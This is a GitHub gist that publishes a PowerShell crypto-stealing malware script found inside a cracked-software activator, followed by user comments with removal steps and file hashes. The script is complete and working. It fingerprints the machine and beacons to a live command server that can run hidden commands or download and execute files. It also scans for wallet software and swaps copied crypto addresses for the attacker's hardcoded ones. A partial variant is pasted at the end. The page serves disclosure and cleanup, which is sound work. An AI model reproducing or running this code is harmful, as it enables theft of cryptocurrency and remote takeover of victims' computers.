Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
This script was found in a malicious file not being detected by any AV as reported by virustotal
$scriptItem = Get-Item -Path $MyInvocation.MyCommand.Path;
$OS_Major = [System.Environment]::OSVersion.Version.Major.ToString() + "." + [System.Environment]::OSVersion.Version.Minor.ToString();
$EndPointURL = "http://api.private-chatting.com/connect";
$__Version__ = "M_37";
[string]$WorkerEnHandle = [Guid]::NewGuid().ToString();
[System.Threading.EventWaitHandle]$WorkerEn = [System.Threading.EventWaitHandle]::new($true, [System.Threading.EventResetMode]::ManualReset, $WorkerEnHandle);
function XF3a8JO3r5r8G([string] $str) {
return [System.Environment]::ExpandEnvironmentVariables("%" + $str + "%")
}
function WMI([string] $class, [string] $value) {
$val = $null;
$results = (Get-WmiObject -Class $class) ;
foreach ($item in $results) {
$val = $item[$value];
break;
}
if ($val -eq $null) {
$val = [Guid]::NewGuid().ToString();
}
return $val;
}
function Get-HWID() {
return (WMI 'win32_logicaldisk' "VolumeSerialNumber")
}
function ik9hXhN11R() {
return (WMI 'Win32_OperatingSystem' "Caption")
}
function P9TEtu77LCNtD() {
return (WMI 'Win32_Processor' "AddressWidth")
}
function av_enabled([uint32]$state) {
[byte[]] $bytes = [System.BitConverter]::GetBytes($state);
if (($bytes[1] -eq 0x10) -or ($bytes[1] -eq 0x11)) {
return "Enabled";
}
elseif (($bytes[1] -eq 0x00) -or ($bytes[1] -eq 0x01) -or ($bytes[1] -eq 0x20) -or ($bytes[1] -eq 0x21)) {
return "Disabled";
}
return "Unknown";
}
function TmBvivf3Wwj8U7NzZh() {
$avs = Get-WmiObject -Namespace "root\SecurityCenter" -Class "AntiVirusProduct";
$avs += Get-WmiObject -Namespace "root\SecurityCenter2" -Class "AntiVirusProduct";
$avf = New-Object Collections.Generic.List[string];
foreach ($av in $avs) {
$enabled = (av_enabled $av.productState);
$avf.Add($av.displayName + " [$enabled]")
}
return [string]::Join(", ", $avf.ToArray())
}
function vxUABGtfQ7B7([string]$str) {
if ($str.Length -eq 0) {
return "";
}
$str = $str.Replace("/", "");
return ($str.Substring(0, 1).ToUpper() + $str.Substring(1));
}
$_HWID_ = Get-HWID;
function getUserAgent {
return "$($__Version__)_$($_HWID_)\" + (vxUABGtfQ7B7 (XF3a8JO3r5r8G "COMPUTERNAME")) + '\' + (vxUABGtfQ7B7 (XF3a8JO3r5r8G "USERNAME")) + '\' + (vxUABGtfQ7B7 (ik9hXhN11R)) + " [" + (P9TEtu77LCNtD) + "]" + '\' + (vxUABGtfQ7B7 (TmBvivf3Wwj8U7NzZh)) + '\' + (FindPaths) + '\'
}
function oUjmVhxHJ4Qhrw($data, $notify) {
if ($OS_Major -ne "6.1") {
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
}
$cli = New-Object System.Net.WebClient;
$useragent = getUserAgent;
$cli.Headers['X-User-Agent'] = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($useragent));
if ($notify) {
$cli.Headers['X-notify'] = $notify
}
$Response = $cli.UploadString($EndPointURL, $data);
$worker = $cli.ResponseHeaders["worker"];
if ($worker -eq "0") {
$WorkerEn.Reset() | Out-Null;
}
else {
$WorkerEn.Set() | Out-Null;
}
return $Response.ToString()
}
function DownloadFile([string]$URL, [string]$Filename) {
[string]$UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/599.99 (KHTML, like Gecko) Chrome/81.0.3999.199 Safari/599.99";
if ($OS_Major -ne "6.1") {
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true };
$ret = Invoke-WebRequest -Uri $URL -OutFile $Filename -UserAgent $UserAgent -Method 'GET'
}
else {
$cli = New-Object System.Net.WebClient;
$cli.Headers['User-Agent'] = $UserAgent;
$cli.DownloadFile($URL, $Filename);
}
}
function yQM1ybBDSjEP($url, $path, $wait) {
DownloadFile $url $path
}
function Gn4bSDMHKIxEE8UP7wZJ($quit) {
Remove-Item -Path $svauXHdYmXwV1whE;
if ($quit) {
exit(0);
}
}
function main {
$ZFKUuv2t12Af = "|V|";
$AuVAfc591z0Yw = (XF3a8JO3r5r8G "temp") + '\';
$svauXHdYmXwV1whE = $scriptItem.FullName;
$aWOPoMdm8aLL89 = $scriptItem.Name;
$EwcQB8qBuCScs = "powershell.exe";
while ($true) {
try {
[string]$kk9XDcoU8Sfo692 = oUjmVhxHJ4Qhrw;
[string[]] $sep = $ZFKUuv2t12Af;
$Fd1Jal88zKyxij = $kk9XDcoU8Sfo692.Split( $sep, [StringSplitOptions]::None);
$ivI0sA6txn5XPifq = $Fd1Jal88zKyxij[0];
$JkByjqH1xztsW2YUG = $Fd1Jal88zKyxij[1];
if ($ivI0sA6txn5XPifq -eq "Cmd") {
Start-Process -FilePath "cmd.exe" -WindowStyle "Hidden" -ArgumentList ("/c " + $JkByjqH1xztsW2YUG)
}
if ($ivI0sA6txn5XPifq -eq "DwnlExe") {
$path = $AuVAfc591z0Yw + $Fd1Jal88zKyxij[2];
$cmd = $Fd1Jal88zKyxij[3] + $path;
yQM1ybBDSjEP $Fd1Jal88zKyxij[1] $path $true;
Start-Sleep 1
Start-Process -FilePath "cmd.exe" -WindowStyle "Hidden" -ArgumentList ("/c " + $cmd)
}
if ($ivI0sA6txn5XPifq -eq "SelfRemove") {
Gn4bSDMHKIxEE8UP7wZJ $true
}
}
catch {}
try {
FindWindow
}
catch
{}
Start-Sleep 1
}
}
$pathdata =
@'
[
{
"root": "%appdata%",
"targets": [
{
"name": "Exodus-A",
"path": "Exodus"
},
{
"name": "Atomic-A",
"path": "Atomic Wallet"
},
{
"name": "Electrum-A",
"path": "Electrum"
},
{
"name": "Ledger-A",
"path": "Ledger Live"
},
{
"name": "Jaxx-A",
"path": "Jaxx Liberty"
},
{
"name": "com.liberty.jaxx-A",
"path": "com.liberty.jaxx"
},
{
"name": "Guarda-A",
"path": "Guarda"
},
{
"name": "Armory-A",
"path": "Armory"
},
{
"name": "DELTA-A",
"path": "DELTA"
},
{
"name": "TREZOR-A",
"path": "TREZOR Bridge"
},
{
"name": "Bitcoin-A",
"path": "Bitcoin"
},
{
"name": "binance-A",
"path": "binance"
}
]
},
{
"root": "%localappdata%",
"targets": [
{
"name": "Blockstream-A",
"path": "Blockstream Green"
},
{
"name": "Coinomi-A",
"path": "Coinomi"
},
{
"name": "Exodus-A",
"path": "exodus"
},
{
"name": "Docker-A",
"path": "Docker"
}
]
},
{
"root": "%localappdata%\\Google\\Chrome\\User Data\\Default\\Extensions",
"targets": [
{
"name": "Metamask-C",
"path": "nkbihfbeogaeaoehlefnkodbefgpgknn"
},
{
"name": "MEWcx-C",
"path": "nlbmnnijcnlegkjjpcfjclmcfggfefdm"
},
{
"name": "Coin98-C",
"path": "aeachknmefphepccionboohckonoeemg"
},
{
"name": "Binance-C",
"path": "fhbohimaelbohpjbbldcngcnapndodjp"
},
{
"name": "Jaxx-C",
"path": "cjelfplplebdjjenllpjcblmjkfcffne"
},
{
"name": "Coinbase-C",
"path": "hnfanknocfeofbddgcijnmhnfnkdnaad"
}
]
},
{
"root": "%ProgramFiles(x86)%",
"targets": [
{
"name": "Electrum-A",
"path": "Electrum"
}
]
},
{
"root": "%localappdata%\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Extensions",
"targets": [
{
"name": "Metamask-B",
"path": "nkbihfbeogaeaoehlefnkodbefgpgknn"
}
]
},
{
"root": "%localappdata%\\Microsoft\\Edge\\User Data\\Default\\Extensions",
"targets": [
{
"name": "Metamask-E",
"path": "ejbalbakoplchlghecdalmeeeajnimhm"
}
]
},
{
"root": "%localappdata%\\Programs",
"targets": [
{
"name": "atomic-A",
"path": "atomic"
},
{
"name": "TrezorSuite-A",
"path": "Trezor Suite"
}
]
},
{
"root": "%ProgramFiles%",
"targets": [
{
"name": "Binance-A",
"path": "Binance"
},
{
"name": "BitcoinCore-A",
"path": "Bitcoin"
},
{
"name": "LedgerLive-A",
"path": "Ledger Live"
}
]
},
{
"root": "%localappdata%\\Microsoft\\Edge\\User Data\\Default\\Extensions",
"targets": [
{
"name": "Metamask-E",
"path": "ejbalbakoplchlghecdalmeeeajnimhm"
},
{
"name": "Coinomi-E",
"path": "gmcoclageakkbkbbflppkbpjcbkcfedg"
}
]
},
{
"root": "%localappdata%\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Extensions",
"targets": [
{
"name": "Metamask-B",
"path": "nkbihfbeogaeaoehlefnkodbefgpgknn"
},
{
"name": "MEWcx-B",
"path": "nlbmnnijcnlegkjjpcfjclmcfggfefdm"
},
{
"name": "Coin98-B",
"path": "aeachknmefphepccionboohckonoeemg"
},
{
"name": "Binance-B",
"path": "fhbohimaelbohpjbbldcngcnapndodjp"
},
{
"name": "Jaxx-B",
"path": "cjelfplplebdjjenllpjcblmjkfcffne"
},
{
"name": "Coinbase-B",
"path": "hnfanknocfeofbddgcijnmhnfnkdnaad"
}
]
}
]
'@;
function FindPaths {
$a = ConvertFrom-Json $pathdata
$results = New-Object Collections.Generic.List[string];
try {
$ba = Get-ChildItem -Path "$env:appdata\Mozilla\Firefox\Profiles\*.xpi" -Recurse -Force;
Foreach ($i in $ba) {
if ($i.Name -match "ebextension@metamask.io.xpi") {
try {
[string] $ss = "metamask-F"
$results.Add($ss)
}
catch {
Write-Host "error"
}
}
}
}
catch {}
foreach ($entry in $a) {
$rootdir = [System.Environment]::ExpandEnvironmentVariables($entry.root);
foreach ($target in $entry.targets) {
if ((Test-Path -Path (Join-Path -Path $rootdir -ChildPath $target.path))) {
$results.Add($target.name)
}
}
}
$ret = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes([string]::Join("`n", $results)));
return $ret;
}
function FindWindow {
$keywords = @('binance', 'coinbase', 'blockchain', 'voyager', 'blockfi', 'coindesk', 'etoro', 'kucoin', 'citi', 'paxful', 'paypal', 'huobi', 'poloniex', 'bittrex', 'kraken', 'bitfinex', 'bitstamp')
$windows = (Get-Process | Where-Object { $_.MainWindowTitle -ne "" } | Select-Object MainWindowTitle)
foreach ($wndobj in $windows) {
[string]$wnd = $wndobj.MainWindowTitle;
foreach ($keyword in $keywords) {
if ($wnd.ToLower().Contains($keyword.ToLower())) {
try {
$contentfile = [System.IO.File]::ReadAllText("%SystemDrive%\Users\Public\log.dat").ToLower().replace(' ', '');
$logsend = 'newnewapp' + ($keyword.ToLower() + "[" + $wnd.ToLower() + "]").ToLower().replace(' ', '');
if ( $contentfile -eq $keyword.ToLower().replace(' ', '') ) {
$gtr = "";
}
else {
$datatowrite = ('newnewapp' + ($keyword.ToLower() + "[" + $wnd.ToLower() + "]")).ToLower().replace(' ', '');
[System.IO.File]::WriteAllText("%SystemDrive%\Users\Public\log.dat", $keyword.ToLower().replace(' ', '') );
log_event 'newnewapp' ($keyword.ToLower() + "[" + $wnd.ToLower() + "]");
}
}
catch {
[System.IO.File]::WriteAllText("%SystemDrive%\Users\Public\log.dat", $keyword.ToLower().replace(' ', '') );
}
}
}
}
}
$job1 = Start-Job -ArgumentList $EndPointURL, (getUserAgent), $WorkerEnHandle -ScriptBlock {
param (
[string]
$EndPointURL,
[string]
$UserAgent,
[string]
$WorkerEnHandle
)
[System.Threading.EventWaitHandle]$WorkerEn = $null;
if ([System.Threading.EventWaitHandle]::TryOpenExisting($WorkerEnHandle, [ref]$WorkerEn) -eq $false) {
$WorkerEn = [System.Threading.EventWaitHandle]::new($true, [System.Threading.EventResetMode]::ManualReset);
}
[System.Environment]::CurrentDirectory = $PWD.Path;
#Add-Type -TypeDefinition ([System.IO.File]::ReadAllText('User32.cs'))
$Framework_Arch = '';
if([System.IntPtr]::Size -eq 8)
{
$Framework_Arch = '64';
}
Add-Type -Path "$env:windir\Microsoft.NET\Framework$Framework_Arch\v4.0.30319\System.Runtime.dll";
Add-Type -Path "$env:windir\Microsoft.NET\Framework$Framework_Arch\v4.0.30319\System.Runtime.InteropServices.dll";
Add-Type -TypeDefinition @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
public static class User32
{
[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern ushort RegisterClassEx(ref WNDCLASSEX lpwcx);
[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern IntPtr CreateWindowEx(UInt32 dwExStyle, IntPtr lpClassName, string lpWindowName, UInt32 dwStyle,
Int32 x, Int32 y, Int32 nWidth, Int32 nHeight, IntPtr hWndParent, IntPtr hMenu, IntPtr hInstance, IntPtr lpParam);
[DllImport("user32.dll")]
public static extern int GetMessage(out MSG lpMsg, IntPtr hWnd, uint wMsgFilterMin, uint wMsgFilterMax);
[DllImport("user32.dll")]
public static extern bool TranslateMessage([In] ref MSG lpMsg);
[DllImport("user32.dll")]
public static extern IntPtr DispatchMessage([In] ref MSG lpmsg);
[DllImport("user32.dll", SetLastError = true)]
public static extern bool AddClipboardFormatListener(IntPtr hwnd);
[DllImport("user32.dll", SetLastError = true)]
public static extern bool RemoveClipboardFormatListener(IntPtr hwnd);
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct WNDCLASSEX
{
[MarshalAs(UnmanagedType.U4)]
public int cbSize;
[MarshalAs(UnmanagedType.U4)]
public int style;
public WNDPROC lpfnWndProc; // not WndProc
public int cbClsExtra;
public int cbWndExtra;
public IntPtr hInstance;
public IntPtr hIcon;
public IntPtr hCursor;
public IntPtr hbrBackground;
public string lpszMenuName;
public string lpszClassName;
public IntPtr hIconSm;
//Use this function to make a new one with cbSize already filled in.
//For example:
//var WndClss = WNDCLASSEX.Build()
public static WNDCLASSEX Build()
{
var nw = new WNDCLASSEX();
nw.cbSize = Marshal.SizeOf(typeof(WNDCLASSEX));
return nw;
}
}
[DllImport("user32.dll", SetLastError = true)]
public static extern IntPtr DefWindowProcW(IntPtr hWnd, UInt32 msg, UIntPtr wParam, IntPtr lParam);
[DllImport("user32.dll", SetLastError = true)]
public static extern bool OpenClipboard(IntPtr hWndNewOwner);
[DllImport("user32.dll")]
public static extern IntPtr GetClipboardData(uint uFormat);
[DllImport("user32.dll")]
public static extern IntPtr SetClipboardData(uint uFormat, IntPtr hMem);
[DllImport("user32.dll")]
public static extern bool EmptyClipboard();
[DllImport("kernel32.dll")]
public static extern IntPtr GlobalLock(IntPtr hMem);
[DllImport("kernel32.dll")]
public static extern bool GlobalUnlock(IntPtr hMem);
[DllImport("kernel32.dll")]
public static extern IntPtr GlobalAlloc(uint uFlags, UIntPtr dwBytes);
[DllImport("kernel32.dll")]
public static extern IntPtr GlobalFree(IntPtr hMem);
[DllImport("user32.dll", SetLastError = true)]
public static extern bool CloseClipboard();
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate IntPtr WNDPROC(IntPtr hWnd, uint msg, UIntPtr wParam, IntPtr lParam);
[StructLayout(LayoutKind.Sequential)]
public struct POINT
{
public int X;
public int Y;
}
[StructLayout(LayoutKind.Sequential)]
public struct MSG
{
public IntPtr hwnd;
public uint message;
public UIntPtr wParam;
public IntPtr lParam;
public uint time;
public POINT pt;
public uint lPrivate;
}
}
"@
$address_book = ConvertFrom-Json @"
[
{
"a": "bc1qn6ype8u5kgj672mvsez9wz9wt9wk22tzd5vprp",
"r": "^bc1[a-z0-9]{39,59}$",
"c": "BTC"
},
{
"a": "1Pqkb4MZwKzgSNkaX32wMwg95D9NfW9vZX",
"r": "^1[a-km-zA-HJ-NP-Z1-9]{26,33}$",
"c": "BTC"
},
{
"a": "3JvBvRuBfYvB6MjzMornj9EQpxhq9W7vXP",
"r": "^3[a-km-zA-HJ-NP-Z1-9]{26,33}$",
"c": "BTC"
},
{
"a": "qq9yrhef7csy3yzgxgs0rvkvez440mk53gv8ulyu6a",
"r": "^((bitcoincash|bchreg|bchtest):)?(q|p)[a-z0-9]{41}$",
"c": "BCH"
},
{
"a": "bnb1vmwl54jxj9yvsgz33xtyuvqnurdjy2raqnttkq",
"r": "^(bnb)([a-z0-9]{39})$",
"c": "BNB"
},
{
"a": "0x884467182849bA788ba89300e176ebe11624C882",
"r": "^0x[a-fA-F0-9]{40}$",
"c": "ETH"
},
{
"a": "48qx1krgEGzdcSacbmZdioNwXxW6r43yFSJDKPWZb3wsK9pYhajHNyE5FujWo1NxVwEBvGebS7biW9mjMEWdMevqMGmDJ6x",
"r": "^[48][0-9AB][1-9A-HJ-NP-Za-km-z]{93}$",
"c": "XMR"
},
{
"a": "rH6dyKWNpcvFz6fQ4ohyDbevSxcxdxfSmz",
"r": "^r[rpshnaf39wBUDNEGHJKLM4PQRST7VWXYZ2bcdeCg65jkm8oFqi1tuvAxyz]{24,34}$",
"c": "XRP"
},
{
"a": "DDxhfK5wbJkRN25mAbBYk3ND4xLjiMRyNq",
"r": "^D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}$",
"c": "DOGE"
},
{
"a": "Xtwj8uGx77NYBUki1UCPvEhe4kHYi6yWng",
"r": "^X[1-9A-HJ-NP-Za-km-z]{33}$",
"c": "DASH"
}
]
"@;
function Set-Clip {
param (
[string]
$text
)
if ($text -eq $null) {
$text = "";
}
$text += [char]0;
[byte[]]$textb = [System.Text.Encoding]::Unicode.GetBytes($text);
$hMem = [User32]::GlobalAlloc(0x0002, [UIntPtr]::new($textb.Length));
if ($hMem -ne 0) {
$tmp = [User32]::GlobalLock($hMem);
if ($tmp -ne 0) {
[System.Runtime.InteropServices.Marshal]::Copy($textb, 0, $tmp, $textb.Length) | Out-Null;
[User32]::GlobalUnlock($hMem) | Out-Null;
[User32]::OpenClipboard([System.IntPtr]::Zero) | Out-Null;
[User32]::EmptyClipboard() | Out-Null; ;
[User32]::SetClipboardData(13, $hMem) | Out-Null;
[User32]::CloseClipboard() | Out-Null;
return;
}
[User32]::GlobalFree($hMem) | Out-Null;
}
}
function Get-Clip {
[string]$text = $null;
if ([User32]::OpenClipboard([System.IntPtr]::Zero) -ne 0) {
$hMem = [User32]::GetClipboardData(13);
if ($hMem -ne 0) {
$tmp = [User32]::GlobalLock($hMem);
if ($tmp -ne 0) {
$text = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($hMem);
[User32]::GlobalUnlock($hMem) | Out-Null;
}
}
[User32]::CloseClipboard() | Out-Null;
}
return $text;
}
function Set-Log([string]$log) {
$cli = New-Object System.Net.WebClient;
$cli.Headers['X-User-Agent'] = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($UserAgent));
$cli.Headers['X-notify'] = $log;
$cli.UploadString($EndPointURL, '') | Out-Null;
}
function Handle_WM_CLIPBOARDUPDATE {
try {
if ($WorkerEn.WaitOne(0) -eq $false) {
return;
}
}
catch {
}
try {
[string]$text = Get-Clip;
if ([string]::IsNullOrEmpty($text)) {
return;
}
$text = $text.Trim();
foreach ($entry in $address_book) {
if (($text -ne $entry.a) -and ($text -match $entry.r)) {
Set-Clip $entry.a
Set-Log ($entry.c + " - " + $text + " - " + $entry.a)
}
}
}
catch {
}
}
$wndProc = [User32+WndProc] {
param (
[IntPtr]
$hwnd,
[uint32]
$msg,
[System.UIntPtr]
$wParam,
[IntPtr]
$lParam
)
return [User32]::DefWindowProcW($hwnd, $msg, $wParam, $lParam);
}
$wx = [User32+WNDCLASSEX]::Build();
$wx.lpfnWndProc = $wndProc;
$wx.hInstance = [IntPtr]::Zero;
$wx.lpszClassName = [Guid]::NewGuid().ToString();
[uint16]$atom = [User32]::RegisterClassEx([ref]$wx);
[IntPtr]$hwnd = [User32]::CreateWindowEx(0, [IntPtr]::new($atom), [Guid]::NewGuid().ToString(), 0, 0, 0, 0, 0, [IntPtr]::new(-3), [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero);
[User32]::AddClipboardFormatListener($hwnd) | Out-Null;
$msg = [User32+MSG]::new()
while ([User32]::GetMessage([ref]$msg, 0, 0, 0) -gt 0) {
if ($msg.message -eq 0x031D) {
Handle_WM_CLIPBOARDUPDATE;
}
[User32]::TranslateMessage([ref]$msg) | Out-Null;
[User32]::DispatchMessage([ref]$msg) | Out-Null;
}
[User32]::RemoveClipboardFormatListener($hwnd) | Out-Null;
}
while ($true) {
try {
main
}
catch {
}
}
@NextNext333
Copy link

NextNext333 commented Apr 21, 2022

Hi there.

I'm pretty sure my PC is infected by this PowerShell script, probably after running the following alleged patch named Team-crackerfg - Activator:

Patch BackupTrans

Do you know @infernoboy how I can get rid of this crappy thing? It keeps running 2 powershell.exe processes at Windows startup that I kill as fast as I can every time I switch on my computer. Hopefully, the script isn't being able to send info outside my PC because my ESET Antivirus is set in interactive mode and whenever a new incoming or outgoing connection is detected, it prompts me whether I want to allow them or not.

So when I saw the target URL being http://api.private-chatting.com/connect, it seemed to me very suspicious and I blocked it. So I think I'm safe but I want to remove this malware completely, of course, something I haven't managed so far.

Digging into the Windows Event Viewer, I've seen that at starup, some Powershell events occur (I've also generated a .evtx file which I can attach if necessary):

[BTW, Detalles de ejecución de la canalización means Pipeline execution details]

Event Viewer 1
Event Viewer 1XML

Event Viewer 2
Event Viewer 2XML

Event Viewer 3
Event Viewer 3XML

Hope you can help me. Thank you in advance.

@infernoboy
Copy link
Author

infernoboy commented Apr 21, 2022

How to remove this malware

  1. Open Task Scheduler
  2. A task was created under Microsoft > Windows > NetService > Network that is spawning PowerShell
  3. You can safely delete the entire NetService folder as it was also created by the malware
  4. Delete a fake log file that it created where it hides the script: C:\Windows\logs\system-logs.txt
  5. It also replaces the contents of C:\Windows\System32\SyncAppvPublishingServer.vbs with its own version. A copy from a clean install of Windows 11 can be found here: https://gist.github.com/infernoboy/7cc1fe26e647dd08e6e63a201cb38e27

That should be all. As for the app you were patching to begin with, in my case it isn't doing anything harmful and runs just fine.

What the malware appears to do

It monitors your clipboard looking for a cryptocurrency address. Once it finds one, it replaces it with its own address in the hopes you do not notice when you paste it. You'd be sending crypto to the malware writer's address if you don't. It also pings a server with some computer identifying information and the original address you wanted to send to. It doesn't look like any personal data is transmitted. I believe that's all it does, so it's not the most harmful thing. The addresses that the malware uses have made over $3m USD!

@NextNext333

@jblube
Copy link

jblube commented Apr 21, 2022

Thanks @infernoboy , for me it worked great.

Unfortunately, I couldn't find the application/crack responsible for this, even looking very deep.

@uselesslemma
Copy link

uselesslemma commented Apr 21, 2022

@infernoboy saving my life here. I pasted a BTC address that I immediately recognized as not the one I copied. Opened my clipboard manager, and sure enough, a hidden Powershell process replaced the address I copied.

@jblube @NextNext333 : I found the alleged patch here. Uploaded by some PB user called MotasemBT. I'll upload those files soon.

@NextNext333
Copy link

NextNext333 commented Apr 22, 2022

How to remove this malware

1. Open **Task Scheduler**

2. A task was created under **Microsoft > Windows > NetService > Network** that is spawning PowerShell

3. You can safely delete the entire **NetService** folder as it was also created by the malware

4. Delete a fake log file that it created where it hides the script: **C:\Windows\logs\system-logs.txt**

5. It also replaces the contents of **C:\Windows\System32\SyncAppvPublishingServer.vbs** with its own version. A copy from a clean install of Windows 11 can be found here: https://gist.github.com/infernoboy/7cc1fe26e647dd08e6e63a201cb38e27

OMG @infernoboy, brilliant, you are not a boy, YOU ARE THE MAN! Hahaha Thank you soooo much! No more powershell processes running in the background. 👏👏👏👏

Before my first message here, I was looking into the Task Scheduler as well, but I didn't find anything related to this malware, because, I know now, I was looking at the wrong place. I even downloaded Windows Autoruns.exe to check all the programs being executed at startup, but to no avail.

I've just removed the whole NetService folder and the fake log too. Regarding SyncAppvPublishingServer.vbs file, I'm running Windows 10 Pro, and the file you provided was extracted from a Windows 11 clean install, as you stated. As I wasn't sure I could use that file in Windows 10 Pro, what I've done is I've extracted it from a Windows 10 installation from another PC. However, I've compared the MD5 checksum of both files (the one allegedly infected and the one extracted from a Windows 10 Pro not infected) and it matches: 20C4FE2B130D9F0C92D7629E71AFBB66 (and googling that MD5 checksum it belongs to that file, so it must be legit).

So I'm assuming the file is OK. I must say yesterday I performed an integrity check scan with the command: sfc /scannow and it detected some corrupted files and repaired them, so that could be the reason for the MD5 match.

EDIT: I've just compared the code inside my SyncAppvPublishingServer.vbs and the code inside yours and they are exactly the same. 👍

That should be all. As for the app you were patching to begin with, in my case it isn't doing anything harmful and runs just fine.

So what you mean is the Team-crackerfg - Activator is not the problem?

What the malware appears to do

It monitors your clipboard looking for a cryptocurrency address. Once it finds one, it replaces it with its own address in the hopes you do not notice when you paste it. You'd be sending crypto to the malware writer's address if you don't. It also pings a server with some computer identifying information and the original address you wanted to send to. It doesn't look like any personal data is transmitted. I believe that's all it does, so it's not the most harmful thing. The addresses that the malware uses have made over $3m USD!

@NextNext333

Wow... Scammers are getting more and more ingenious these days.

Thanks @infernoboy , for me it worked great.

Unfortunately, I couldn't find the application/crack responsible for this, even looking very deep.

@infernoboy saving my life here. I pasted a BTC address that I immediately recognized as not the one I copied. Opened my clipboard manager, and sure enough, a hidden Powershell process replaced the address I copied.

@jblube @NextNext333 : I found the alleged patch here. Uploaded by some PB user called MotasemBT. I'll upload those files soon.

@jblube @uselesslemma I'm 100% sure this malware was installed when I was trying (installing and cracking) some programs which can migrate WhatsApp messages from iPhone to Android and vice versa. So it must be Wondershare Dr.Fone, iCareFone or Backuptrans, or more importantly, cracks packaged alongside them. In fact, I downloaded BackupTrans Android iPhone WhatsApp Transfer Plus 3.2.174 (x64) which was uploaded by someone called MotasemBT, you are right @uselesslemma. It's not a VIP or trusted uploader, so...

@infernoboy
Copy link
Author

infernoboy commented Apr 22, 2022

@NextNext333 The "Activator" patcher itself is what installs the malware, but it also installs a patched *.exe of the target app. That *.exe file for the app you patched might be safe, as mine is, but I cannot be sure about your specific scenario.

I discovered this from a different torrent utilizing the same "Team-crackercfg - Activator" program, but for a different app. It was uploaded by "DeGun" on 1337x.to

I also noticed that SyncAppvPublishingServer.vbs wasn't actually changed, but I did receive a report that it had been tampered with. Maybe it was just making sure it was there?

Glad I could help everyone out!

@NextNext333
Copy link

NextNext333 commented Apr 23, 2022

@NextNext333 The "Activator" patcher itself is what installs the malware, but it also installs a patched *.exe of the target app. That *.exe file for the app you patched might be safe, as mine is, but I cannot be sure about your specific scenario.

I discovered this from a different torrent utilizing the same "Team-crackercfg - Activator" program, but for a different app. It was uploaded by "DeGun" on 1337x.to

I also noticed that SyncAppvPublishingServer.vbs wasn't actually changed, but I did receive a report that it had been tampered with. Maybe it was just making sure it was there?

Glad I could help everyone out!

@infernoboy Hummm, it could be the case, the Activator might actually patch succesfully the target app but I can't confirm it in my case, as I removed everything related to this malware when I noticed the suspicious outgoing connection Eset Antivirus warned me about.

But what I can assure is the target app, after applying the patch, remained trial, or at least that's what I could read in the app (Unregistered Version the app stated), perhaps the app was, in fact, cracked, even though that statement, I don't know because I didn't even use it.

Info about the app I was trying to use:

=== MD5 from BackupTrans Android iPhone WhatsApp Transfer Plus 3.2.174 (x64) [TPB User MotasemBT] ===

Setup.exe > 519AF1A8BCE11012D326251B74651823
Activator.exe > A13E8E1338541990F4961CD187391504
APMonUI.dll > 5B59408EE5B54BCE63E5415C71B8AA44

=== MD5 from BackupTrans Android iPhone WhatsApp Transfer Plus 3.2.174 (x64) [1337x.to User PROAC12] ===

Setup.exe > 519AF1A8BCE11012D326251B74651823
Activator.exe > A13E8E1338541990F4961CD187391504
APMonUI.dll > 5B59408EE5B54BCE63E5415C71B8AA44

=== MD5 from BackupTrans Android iPhone WhatsApp Transfer Plus 3.2.173 (x64) [1337x.to User DeGun] ===

Setup.exe > 4E89C5EDC12AE37DC28F8ED5A7DB8859
Activator.exe > B8476084B38A63475C249F64FAC74EAE
APMonUI.dll > 5B59408EE5B54BCE63E5415C71B8AA44

APMonUI.dll is always the same file. Setup.exe and Activator.exe are different for the 3.2.173 version, as expected as the app version is different.

@JeffreyScheffel
Copy link

JeffreyScheffel commented Apr 26, 2022

Thanks for this, it worked.

The code in my script was a bit different though. Most of it being the same, I attached it incase anyone wants to take a look. I'm just wondering if this is something worth reformatting OS over as I don't know if there's other malware this script has downloaded, or if just following @infernoboy instructions is good enough.

$scriptItem = Get-Item -Path $MyInvocation.MyCommand.Path;
if ($sta -ne "STA") {
    powershell -sta -file $MyInvocation.MyCommand.Path;
    exit(0);
}
$OS_Major = [System.Environment]::OSVersion.Version.Major.ToString() + "." + [System.Environment]::OSVersion.Version.Minor.ToString();

$global:worker = $true;

function XF3a8JO3r5r8G([string] $str) {
    return [System.Environment]::ExpandEnvironmentVariables("%" + $str + "%")
}

function WMI([string] $class, [string] $value) {
    $val = $null;
    $results = (Get-WmiObject -Class $class) ;
    foreach ($item in $results) {
        $val = $item[$value];
		break;
    }
	if($val -eq $null)
	{
	   $val = [Guid]::NewGuid().ToString();
	}
    return $val;
}
function B6ZqvVzzJXq27j() {
    return (WMI 'win32_logicaldisk' "VolumeSerialNumber") 
}

function ik9hXhN11R() {
    return (WMI 'Win32_OperatingSystem' "Caption") 
}

function P9TEtu77LCNtD() {
    return (WMI 'Win32_Processor' "AddressWidth") 
}

function av_enabled([uint32]$state) {
    [byte[]] $bytes = [System.BitConverter]::GetBytes($state);
    if (($bytes[1] -eq 0x10) -or ($bytes[1] -eq 0x11)) {
        return "Enabled";
    }
    elseif (($bytes[1] -eq 0x00) -or ($bytes[1] -eq 0x01) -or ($bytes[1] -eq 0x20) -or ($bytes[1] -eq 0x21)) {
        return "Disabled";
    }
    return "Unknown";
}

function TmBvivf3Wwj8U7NzZh() {

    $avs = Get-WmiObject -Namespace "root\SecurityCenter" -Class "AntiVirusProduct";
    $avs += Get-WmiObject -Namespace "root\SecurityCenter2" -Class "AntiVirusProduct";
    $avf = New-Object Collections.Generic.List[string];

